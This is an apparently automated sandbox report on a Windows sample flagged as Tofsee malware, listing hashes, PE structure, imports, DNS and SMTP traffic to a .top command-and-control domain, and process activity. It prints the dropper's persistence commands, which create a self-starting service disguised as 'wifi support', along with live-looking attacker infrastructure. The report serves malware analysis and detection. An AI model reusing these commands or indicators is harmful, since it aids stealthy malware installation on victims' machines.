                                                                                                                                SHA256:a96edd53cb70eb51f8bb9fbd0b9d0777e6b65c5203fb3b73229431b49da155e4
                                                                                                                                SHA512:329977d9720746a390d42f0f30683a8cf1091206b35d23714087c89a8dc871b5f6ad9ed7ce7989fd0fb17103692dfa0dd9d180f740aee9bcc288bb8df8237c8a
                                                                                                                                SSDEEP:6144:X6/jAHYI3JJGBq+AQX7xu0VMjqzt3zSQbcE/KTYuJfzlQ:XKjbQG4fQX1u0VMjqJGsCUMy
                                                                                                                                TLSH:EA549D10BB90D039F5BB16F85A7A926CB93E7AA0573450CF53D526EE5A346E0EC3130B
                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Q......]...]...]..G]...]..Q]...]2..]...]...]...]..V])..]..F]...]..C]...]Rich...]........PE..L...U..a......................d....

                                                                                                                                File Icon

                                                                                                                                Icon Hash:aecaae9ecea62aa2

                                                                                                                                Static PE Info

                                                                                                                                General

                                                                                                                                Entrypoint:0x40b800
                                                                                                                                Entrypoint Section:.text
                                                                                                                                Digitally signed:false
                                                                                                                                Imagebase:0x400000
                                                                                                                                Subsystem:windows gui
                                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                Time Stamp:0x61AD8955 [Mon Dec 6 03:53:57 2021 UTC]
                                                                                                                                TLS Callbacks:
                                                                                                                                CLR (.Net) Version:
                                                                                                                                OS Version Major:5
                                                                                                                                OS Version Minor:0
                                                                                                                                File Version Major:5
                                                                                                                                File Version Minor:0
                                                                                                                                Subsystem Version Major:5
                                                                                                                                Subsystem Version Minor:0
                                                                                                                                Import Hash:65ad0564921c8780ff1d72c1fb80ab35

                                                                                                                                Entrypoint Preview

                                                                                                                                Instruction
                                                                                                                                mov edi, edi
                                                                                                                                push ebp
                                                                                                                                mov ebp, esp
                                                                                                                                call 00007F622C9ACB3Bh
                                                                                                                                call 00007F622C9A2656h
                                                                                                                                pop ebp
                                                                                                                                ret
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                mov edi, edi
                                                                                                                                push ebp
                                                                                                                                mov ebp, esp
                                                                                                                                push FFFFFFFEh
                                                                                                                                push 0042FF68h
                                                                                                                                push 0040EE70h
                                                                                                                                mov eax, dword ptr fs:[00000000h]
                                                                                                                                push eax
                                                                                                                                add esp, FFFFFF94h
                                                                                                                                push ebx
                                                                                                                                push esi
                                                                                                                                push edi
                                                                                                                                mov eax, dword ptr [00442394h]
                                                                                                                                xor dword ptr [ebp-08h], eax
                                                                                                                                xor eax, ebp
                                                                                                                                push eax
                                                                                                                                lea eax, dword ptr [ebp-10h]
                                                                                                                                mov dword ptr fs:[00000000h], eax
                                                                                                                                mov dword ptr [ebp-18h], esp
                                                                                                                                mov dword ptr [ebp-70h], 00000000h
                                                                                                                                mov dword ptr [ebp-04h], 00000000h
                                                                                                                                lea eax, dword ptr [ebp-60h]
                                                                                                                                push eax
                                                                                                                                call dword ptr [0040120Ch]
                                                                                                                                mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                jmp 00007F622C9A2668h
                                                                                                                                mov eax, 00000001h
                                                                                                                                ret
                                                                                                                                mov esp, dword ptr [ebp-18h]
                                                                                                                                mov dword ptr [ebp-78h], 000000FFh
                                                                                                                                mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                mov eax, dword ptr [ebp-78h]
                                                                                                                                jmp 00007F622C9A2798h
                                                                                                                                mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                call 00007F622C9A27D4h
                                                                                                                                mov dword ptr [ebp-6Ch], eax
                                                                                                                                push 00000001h
                                                                                                                                call 00007F622C9AE4AAh
                                                                                                                                add esp, 04h
                                                                                                                                test eax, eax
                                                                                                                                jne 00007F622C9A264Ch
                                                                                                                                push 0000001Ch
                                                                                                                                call 00007F622C9A278Ch
                                                                                                                                add esp, 04h
                                                                                                                                call 00007F622C9ADDA4h
                                                                                                                                test eax, eax
                                                                                                                                jne 00007F622C9A264Ch
                                                                                                                                push 00000010h

                                                                                                                                Rich Headers

                                                                                                                                Programming Language:
                                                                                                                                • [ASM] VS2008 build 21022
                                                                                                                                • [ C ] VS2008 build 21022
                                                                                                                                • [IMP] VS2005 build 50727
                                                                                                                                • [C++] VS2008 build 21022
                                                                                                                                • [RES] VS2008 build 21022
                                                                                                                                • [LNK] VS2008 build 21022

                                                                                                                                Data Directories

                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x306ac0x28.text
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x6740000x4588.rsrc
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x13300x1c.text
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x9a800x40.text
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x10000x2e4.text
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                Sections

                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                .text0x10000x308180x30a00False0.4311887451799486COM executable for DOS6.320508702079994IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                .data0x320000x63d6100x11a00unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                .xovuhih0x6700000x50x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                .nos0x6710000x4000x400False0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                .xij0x6720000x4000x400False0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                .devo0x6730000x320x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                .rsrc0x6740000x45880x4600False0.7131696428571429data6.230571562371972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                Resources

                                                                                                                                NameRVASizeTypeLanguageCountry
                                                                                                                                AFX_DIALOG_LAYOUT0x677a080x2dataKoreanNorth Korea
                                                                                                                                AFX_DIALOG_LAYOUT0x677a080x2dataKoreanSouth Korea
                                                                                                                                RT_ICON0x6742b00x25a8dataKoreanNorth Korea
                                                                                                                                RT_ICON0x6742b00x25a8dataKoreanSouth Korea
                                                                                                                                RT_ICON0x6768580x10a8dataKoreanNorth Korea
                                                                                                                                RT_ICON0x6768580x10a8dataKoreanSouth Korea
                                                                                                                                RT_STRING0x677b500x48cdataKoreanNorth Korea
                                                                                                                                RT_STRING0x677b500x48cdataKoreanSouth Korea
                                                                                                                                RT_STRING0x677fe00x498dataKoreanNorth Korea
                                                                                                                                RT_STRING0x677fe00x498dataKoreanSouth Korea
                                                                                                                                RT_STRING0x6784780x10adataKoreanNorth Korea
                                                                                                                                RT_STRING0x6784780x10adataKoreanSouth Korea
                                                                                                                                RT_ACCELERATOR0x6779a00x68dataKoreanNorth Korea
                                                                                                                                RT_ACCELERATOR0x6779a00x68dataKoreanSouth Korea
                                                                                                                                RT_ACCELERATOR0x6779280x78dataKoreanNorth Korea
                                                                                                                                RT_ACCELERATOR0x6779280x78dataKoreanSouth Korea
                                                                                                                                RT_GROUP_ICON0x6779000x22dataKoreanNorth Korea
                                                                                                                                RT_GROUP_ICON0x6779000x22dataKoreanSouth Korea
                                                                                                                                RT_VERSION0x677a100x140MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79KoreanNorth Korea
                                                                                                                                RT_VERSION0x677a100x140MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79KoreanSouth Korea

                                                                                                                                Imports

                                                                                                                                DLLImport
                                                                                                                                KERNEL32.dllOpenProcess, GetNamedPipeHandleStateA, GetQueuedCompletionStatus, FillConsoleOutputCharacterA, EnumSystemCodePagesW, TerminateProcess, GetVolumeNameForVolumeMountPointA, GetVersionExA, VerifyVersionInfoA, WriteConsoleInputA, EnumDateFormatsA, FindNextFileA, CopyFileExW, BuildCommDCBAndTimeoutsA, VirtualLock, WriteProfileStringA, VerifyVersionInfoW, GetDriveTypeW, GetFileInformationByHandle, DeleteFileA, FindNextVolumeMountPointW, TlsGetValue, ResetWriteWatch, GetConsoleTitleW, GetComputerNameExW, GetTimeZoneInformation, GetModuleHandleA, GetSystemDirectoryA, GetDriveTypeA, LoadLibraryA, GetShortPathNameW, ReleaseActCtx, GetProfileSectionW, DeleteFileW, GetCommandLineA, InterlockedIncrement, InterlockedExchangeAdd, CreateActCtxW, FindResourceA, FormatMessageA, GetModuleFileNameA, CreateJobObjectW, InitializeCriticalSection, GetNumberOfConsoleMouseButtons, FindNextVolumeA, CreateNamedPipeW, WritePrivateProfileStringA, GetConsoleAliasesLengthW, WriteProfileSectionW, AddAtomA, InterlockedDecrement, GetVersionExW, HeapFree, _hread, InterlockedCompareExchange, GetStartupInfoW, ConnectNamedPipe, GetCPInfoExA, GetSystemWow64DirectoryW, GetLastError, GetPrivateProfileIntW, GetConsoleAliasExesW, DebugBreak, EndUpdateResourceA, GetTickCount, VirtualQueryEx, DeleteVolumeMountPointA, OpenFileMappingA, GetModuleHandleW, SetDefaultCommConfigA, VirtualAlloc, GetSystemWindowsDirectoryA, GetACP, GetDiskFreeSpaceExA, EnumResourceTypesA, IsProcessInJob, WriteConsoleW, GetProcAddress, lstrcpyA, LoadLibraryW, ReadConsoleOutputW, SetHandleInformation, WritePrivateProfileSectionA, DeleteCriticalSection, GetFileAttributesA, DeactivateActCtx, CopyFileW, GlobalMemoryStatus, SetTapeParameters, GetDevicePowerState, ResetEvent, LockFile, MoveFileA, DisableThreadLibraryCalls, GetOverlappedResult, SetCommTimeouts, GlobalAlloc, SetThreadPriorityBoost, SetFileShortNameW, GetFileAttributesW, SetCalendarInfoA, ConvertFiberToThread, GetConsoleTitleA, SetComputerNameW, GetConsoleAliasesA, SetConsoleOutputCP, MoveFileWithProgressW, GetStdHandle, GetLocalTime, FoldStringW, EnumSystemLocalesW, ActivateActCtx, OpenSemaphoreA, GetModuleHandleExA, GetFileSize, SetUnhandledExceptionFilter, GetConsoleAliasesLengthA, SetProcessShutdownParameters, lstrcpynW, GlobalUnWire, FillConsoleOutputCharacterW, GetCompressedFileSizeA, ReadConsoleA, FreeUserPhysicalPages, WriteConsoleOutputCharacterW, TerminateJobObject, CreateFileA, SetTimerQueueTimer, SetLastError, UnhandledExceptionFilter, RaiseException, GetStartupInfoA, HeapValidate, IsBadReadPtr, EnterCriticalSection, LeaveCriticalSection, GetModuleFileNameW, GetCurrentProcess, IsDebuggerPresent, CloseHandle, SetStdHandle, GetFileType, WriteFile, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, Sleep, ExitProcess, QueryPerformanceCounter, GetCurrentThreadId, GetCurrentProcessId, GetSystemTimeAsFileTime, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, TlsAlloc, TlsSetValue, TlsFree, HeapDestroy, HeapCreate, VirtualFree, HeapAlloc, HeapSize, HeapReAlloc, GetOEMCP, GetCPInfo, IsValidCodePage, RtlUnwind, InitializeCriticalSectionAndSpinCount, OutputDebugStringA, OutputDebugStringW, FlushFileBuffers, WriteConsoleA, GetConsoleOutputCP, MultiByteToWideChar, SetFilePointer, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, ReadFile

                                                                                                                                Possible Origin

                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                KoreanNorth Korea
                                                                                                                                KoreanSouth Korea

                                                                                                                                Network Behavior

                                                                                                                                Snort IDS Alerts

                                                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                192.168.2.38.8.8.854960532023883 07/07/22-01:02:53.847400UDP2023883ET DNS Query to a *.top domain - Likely Hostile5496053192.168.2.38.8.8.8
                                                                                                                                192.168.2.38.8.8.863332532023883 07/07/22-01:02:13.617293UDP2023883ET DNS Query to a *.top domain - Likely Hostile6333253192.168.2.38.8.8.8
                                                                                                                                192.168.2.38.8.8.857723532023883 07/07/22-01:01:33.050484UDP2023883ET DNS Query to a *.top domain - Likely Hostile5772353192.168.2.38.8.8.8

                                                                                                                                Network Port Distribution

                                                                                                                                TCP Packets

                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Jul 7, 2022 01:01:30.481129885 CEST4974425192.168.2.340.93.207.0
                                                                                                                                Jul 7, 2022 01:01:30.587388992 CEST254974440.93.207.0192.168.2.3
                                                                                                                                Jul 7, 2022 01:01:30.587618113 CEST4974425192.168.2.340.93.207.0
                                                                                                                                Jul 7, 2022 01:01:30.588087082 CEST4974425192.168.2.340.93.207.0
                                                                                                                                Jul 7, 2022 01:01:30.694906950 CEST254974440.93.207.0192.168.2.3
                                                                                                                                Jul 7, 2022 01:01:30.696717024 CEST254974440.93.207.0192.168.2.3
                                                                                                                                Jul 7, 2022 01:01:30.696882010 CEST4974425192.168.2.340.93.207.0
                                                                                                                                Jul 7, 2022 01:01:30.700531006 CEST254974440.93.207.0192.168.2.3
                                                                                                                                Jul 7, 2022 01:01:30.700675011 CEST4974425192.168.2.340.93.207.0
                                                                                                                                Jul 7, 2022 01:01:33.441209078 CEST49745443192.168.2.346.173.215.82
                                                                                                                                Jul 7, 2022 01:01:33.441263914 CEST4434974546.173.215.82192.168.2.3
                                                                                                                                Jul 7, 2022 01:01:33.441358089 CEST49745443192.168.2.346.173.215.82
                                                                                                                                Jul 7, 2022 01:02:13.457570076 CEST49745443192.168.2.346.173.215.82
                                                                                                                                Jul 7, 2022 01:02:13.457674980 CEST4434974546.173.215.82192.168.2.3
                                                                                                                                Jul 7, 2022 01:02:13.457745075 CEST49745443192.168.2.346.173.215.82
                                                                                                                                Jul 7, 2022 01:02:13.682745934 CEST49762443192.168.2.346.173.215.82
                                                                                                                                Jul 7, 2022 01:02:13.682801962 CEST4434976246.173.215.82192.168.2.3
                                                                                                                                Jul 7, 2022 01:02:13.682898998 CEST49762443192.168.2.346.173.215.82
                                                                                                                                Jul 7, 2022 01:02:53.693027020 CEST49762443192.168.2.346.173.215.82
                                                                                                                                Jul 7, 2022 01:02:53.693145037 CEST4434976246.173.215.82192.168.2.3
                                                                                                                                Jul 7, 2022 01:02:53.693253994 CEST49762443192.168.2.346.173.215.82
                                                                                                                                Jul 7, 2022 01:02:54.217214108 CEST49843443192.168.2.346.173.215.82
                                                                                                                                Jul 7, 2022 01:02:54.217258930 CEST4434984346.173.215.82192.168.2.3
                                                                                                                                Jul 7, 2022 01:02:54.217355013 CEST49843443192.168.2.346.173.215.82

                                                                                                                                UDP Packets

                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Jul 7, 2022 01:01:30.330734015 CEST5592353192.168.2.38.8.8.8
                                                                                                                                Jul 7, 2022 01:01:30.477118969 CEST53559238.8.8.8192.168.2.3
                                                                                                                                Jul 7, 2022 01:01:33.050483942 CEST5772353192.168.2.38.8.8.8
                                                                                                                                Jul 7, 2022 01:01:33.439902067 CEST53577238.8.8.8192.168.2.3
                                                                                                                                Jul 7, 2022 01:02:13.617292881 CEST6333253192.168.2.38.8.8.8
                                                                                                                                Jul 7, 2022 01:02:13.637813091 CEST53633328.8.8.8192.168.2.3
                                                                                                                                Jul 7, 2022 01:02:53.847399950 CEST5496053192.168.2.38.8.8.8
                                                                                                                                Jul 7, 2022 01:02:54.216084003 CEST53549608.8.8.8192.168.2.3
                                                                                                                                Jul 7, 2022 01:03:23.491235971 CEST5060853192.168.2.38.8.8.8
                                                                                                                                Jul 7, 2022 01:03:23.522816896 CEST53506088.8.8.8192.168.2.3

                                                                                                                                DNS Queries

                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                Jul 7, 2022 01:01:30.330734015 CEST192.168.2.38.8.8.80x6f50Standard query (0)microsoft-com.mail.protection.outlook.comA (IP address)IN (0x0001)
                                                                                                                                Jul 7, 2022 01:01:33.050483942 CEST192.168.2.38.8.8.80xcdaStandard query (0)svartalfheim.topA (IP address)IN (0x0001)
                                                                                                                                Jul 7, 2022 01:02:13.617292881 CEST192.168.2.38.8.8.80xf416Standard query (0)svartalfheim.topA (IP address)IN (0x0001)
                                                                                                                                Jul 7, 2022 01:02:53.847399950 CEST192.168.2.38.8.8.80xf180Standard query (0)svartalfheim.topA (IP address)IN (0x0001)
                                                                                                                                Jul 7, 2022 01:03:23.491235971 CEST192.168.2.38.8.8.80xfda6Standard query (0)microsoft-com.mail.protection.outlook.comA (IP address)IN (0x0001)

                                                                                                                                DNS Answers

                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                Jul 7, 2022 01:01:30.477118969 CEST8.8.8.8192.168.2.30x6f50No error (0)microsoft-com.mail.protection.outlook.com40.93.207.0A (IP address)IN (0x0001)
                                                                                                                                Jul 7, 2022 01:01:30.477118969 CEST8.8.8.8192.168.2.30x6f50No error (0)microsoft-com.mail.protection.outlook.com40.93.207.1A (IP address)IN (0x0001)
                                                                                                                                Jul 7, 2022 01:01:30.477118969 CEST8.8.8.8192.168.2.30x6f50No error (0)microsoft-com.mail.protection.outlook.com104.47.53.36A (IP address)IN (0x0001)
                                                                                                                                Jul 7, 2022 01:01:30.477118969 CEST8.8.8.8192.168.2.30x6f50No error (0)microsoft-com.mail.protection.outlook.com104.47.54.36A (IP address)IN (0x0001)
                                                                                                                                Jul 7, 2022 01:01:30.477118969 CEST8.8.8.8192.168.2.30x6f50No error (0)microsoft-com.mail.protection.outlook.com52.101.24.0A (IP address)IN (0x0001)
                                                                                                                                Jul 7, 2022 01:01:33.439902067 CEST8.8.8.8192.168.2.30xcdaNo error (0)svartalfheim.top46.173.215.82A (IP address)IN (0x0001)
                                                                                                                                Jul 7, 2022 01:02:13.637813091 CEST8.8.8.8192.168.2.30xf416No error (0)svartalfheim.top46.173.215.82A (IP address)IN (0x0001)
                                                                                                                                Jul 7, 2022 01:02:54.216084003 CEST8.8.8.8192.168.2.30xf180No error (0)svartalfheim.top46.173.215.82A (IP address)IN (0x0001)
                                                                                                                                Jul 7, 2022 01:03:23.522816896 CEST8.8.8.8192.168.2.30xfda6No error (0)microsoft-com.mail.protection.outlook.com104.47.53.36A (IP address)IN (0x0001)
                                                                                                                                Jul 7, 2022 01:03:23.522816896 CEST8.8.8.8192.168.2.30xfda6No error (0)microsoft-com.mail.protection.outlook.com104.47.54.36A (IP address)IN (0x0001)
                                                                                                                                Jul 7, 2022 01:03:23.522816896 CEST8.8.8.8192.168.2.30xfda6No error (0)microsoft-com.mail.protection.outlook.com52.101.24.0A (IP address)IN (0x0001)
                                                                                                                                Jul 7, 2022 01:03:23.522816896 CEST8.8.8.8192.168.2.30xfda6No error (0)microsoft-com.mail.protection.outlook.com40.93.207.0A (IP address)IN (0x0001)
                                                                                                                                Jul 7, 2022 01:03:23.522816896 CEST8.8.8.8192.168.2.30xfda6No error (0)microsoft-com.mail.protection.outlook.com40.93.207.1A (IP address)IN (0x0001)

                                                                                                                                SMTP Packets

                                                                                                                                TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                                Jul 7, 2022 01:01:30.696717024 CEST254974440.93.207.0192.168.2.3220 CB1PEPF00002061.mail.protection.outlook.com Microsoft ESMTP MAIL Service ready at Wed, 6 Jul 2022 23:01:30 +0000

                                                                                                                                Statistics

                                                                                                                                CPU Usage

                                                                                                                                Click to jump to process

                                                                                                                                Memory Usage

                                                                                                                                Click to jump to process

                                                                                                                                High Level Behavior Distribution

                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                Behavior

                                                                                                                                Click to jump to process

                                                                                                                                System Behavior

                                                                                                                                General

                                                                                                                                Target ID:0
                                                                                                                                Start time:01:01:18
                                                                                                                                Start date:07/07/2022
                                                                                                                                Path:C:\Users\user\Desktop\OcmKX57vR7.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\Desktop\OcmKX57vR7.exe"
                                                                                                                                Imagebase:0x400000
                                                                                                                                File size:293376 bytes
                                                                                                                                MD5 hash:DB4D9CA855430682836DB0A535E75594
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000000.00000003.265491962.0000000000AF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: MALWARE_Win_Tofsee, Description: Detects Tofsee, Source: 00000000.00000003.265491962.0000000000AF0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                • Rule: MALWARE_Win_Tofsee, Description: Detects Tofsee, Source: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                                                                                Reputation:low

                                                                                                                                General

                                                                                                                                Target ID:1
                                                                                                                                Start time:01:01:22
                                                                                                                                Start date:07/07/2022
                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ghrubsm\
                                                                                                                                Imagebase:0xc20000
                                                                                                                                File size:232960 bytes
                                                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high

                                                                                                                                General

                                                                                                                                Target ID:2
                                                                                                                                Start time:01:01:23
                                                                                                                                Start date:07/07/2022
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff7c9170000
                                                                                                                                File size:625664 bytes
                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high

                                                                                                                                General

                                                                                                                                Target ID:3
                                                                                                                                Start time:01:01:23
                                                                                                                                Start date:07/07/2022
                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\pjzcupje.exe" C:\Windows\SysWOW64\ghrubsm\
                                                                                                                                Imagebase:0xc20000
                                                                                                                                File size:232960 bytes
                                                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high

                                                                                                                                General

                                                                                                                                Target ID:4
                                                                                                                                Start time:01:01:23
                                                                                                                                Start date:07/07/2022
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff7c9170000
                                                                                                                                File size:625664 bytes
                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high

                                                                                                                                General

                                                                                                                                Target ID:5
                                                                                                                                Start time:01:01:24
                                                                                                                                Start date:07/07/2022
                                                                                                                                Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\System32\sc.exe" create ghrubsm binPath= "C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe /d\"C:\Users\user\Desktop\OcmKX57vR7.exe\"" type= own start= auto DisplayName= "wifi support
                                                                                                                                Imagebase:0xcd0000
                                                                                                                                File size:60928 bytes
                                                                                                                                MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high

                                                                                                                                General

                                                                                                                                Target ID:7
                                                                                                                                Start time:01:01:24
                                                                                                                                Start date:07/07/2022
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff7c9170000
                                                                                                                                File size:625664 bytes
                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high

                                                                                                                                General

                                                                                                                                Target ID:8
                                                                                                                                Start time:01:01:25
                                                                                                                                Start date:07/07/2022
                                                                                                                                Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\System32\sc.exe" description ghrubsm "wifi internet conection
                                                                                                                                Imagebase:0xcd0000
                                                                                                                                File size:60928 bytes
                                                                                                                                MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high

                                                                                                                                General

                                                                                                                                Target ID:10
                                                                                                                                Start time:01:01:25
                                                                                                                                Start date:07/07/2022
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff7c9170000
                                                                                                                                File size:625664 bytes
                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high

                                                                                                                                General

                                                                                                                                Target ID:11
                                                                                                                                Start time:01:01:26
                                                                                                                                Start date:07/07/2022
                                                                                                                                Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Windows\System32\sc.exe" start ghrubsm
                                                                                                                                Imagebase:0xcd0000
                                                                                                                                File size:60928 bytes
                                                                                                                                MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high

                                                                                                                                General

                                                                                                                                Target ID:12
                                                                                                                                Start time:01:01:26
                                                                                                                                Start date:07/07/2022
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff7c9170000
                                                                                                                                File size:625664 bytes
                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high

                                                                                                                                General

                                                                                                                                Target ID:13
                                                                                                                                Start time:01:01:27
                                                                                                                                Start date:07/07/2022
                                                                                                                                Path:C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe
                                                                                                                                Wow64 process (32bit):true
